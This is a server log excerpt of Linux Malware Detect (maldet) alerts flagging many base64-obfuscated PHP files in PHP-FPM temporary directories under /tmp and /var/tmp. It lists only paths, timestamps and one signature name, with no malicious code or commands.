Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec14eef09.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cfc39dc2b.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e9f3bb3f8.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf49bf857.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e9b7ee5a.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cc45e6e8.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec3b4156a.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cac306fc.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614bea10bdd.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618d9356f01.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eb027dbf9.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961aea707666.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e809e56e.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614c923e074.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614ec5309b4.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961ae957ee87.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea4bbf724.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e2581919.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cfdd1909.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696210f17cd0b.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eaee58349.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e98dea8b1.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ebdc17031.php
Jan 10 2026 04:03:16 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cc793061.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e9779161d.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616ee05cf95.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616d5e67f89.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea0cdf927.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961aeb6d8d14.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea362298d.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ebef9ee34.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e958c464.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618db44dbc1.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e95fb5913.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f05e08197.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f06ed55fd.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eb15ba223.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696211142873d.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618de8500cd.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69610a3fcafe4.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616dc9bf295.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f605f62a.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cfaade2a1.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618da3af2ce.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616eabe1d5c.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614eaf17101.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d78d796b.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696211265a8a9.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f49d2b37.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf63d0e89.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e6b09830.php
Jan 10 2026 04:03:17 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cde25005.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec295d03e.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e0d9dcfa.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea21f33ff.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f03ae4147.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d9280cbd.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961ae85f00dd.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f0171c58b.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6962113744aab.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69621148233f5.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618dd75e91d.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614c20b555e.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e3d0be92.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d16756f9.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614ce143777.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614dab21571.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618dc65ce3a.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cf69a30a.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f34e879e.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69621103130f1.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f04c4f2a2.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf7ce2d74.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f02a6ae0a.php
Jan 10 2026 04:03:18 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec14eef09.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cfc39dc2b.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e9f3bb3f8.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cf49bf857.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e9b7ee5a.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616cc45e6e8.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ec3b4156a.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cac306fc.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614bea10bdd.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618d9356f01.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eb027dbf9.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961aea707666.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e809e56e.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614c923e074.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614ec5309b4.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961ae957ee87.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea4bbf724.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614e2581919.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cfdd1909.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696210f17cd0b.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eaee58349.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e98dea8b1.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ebdc17031.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614cc793061.php
Jan 10 2026 04:03:19 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e9779161d.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616ee05cf95.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616d5e67f89.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea0cdf927.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961aeb6d8d14.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ea362298d.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960ebef9ee34.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616e958c464.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618db44dbc1.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960e95fb5913.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f05e08197.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961f06ed55fd.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960eb15ba223.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696211142873d.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618de8500cd.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69610a3fcafe4.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616dc9bf295.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f605f62a.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6961cfaade2a1.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69618da3af2ce.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616eabe1d5c.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614eaf17101.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69614d78d796b.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696211265a8a9.php
Jan 10 2026 04:03:20 web1 maldet(1529358): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69616f49d2b37.php
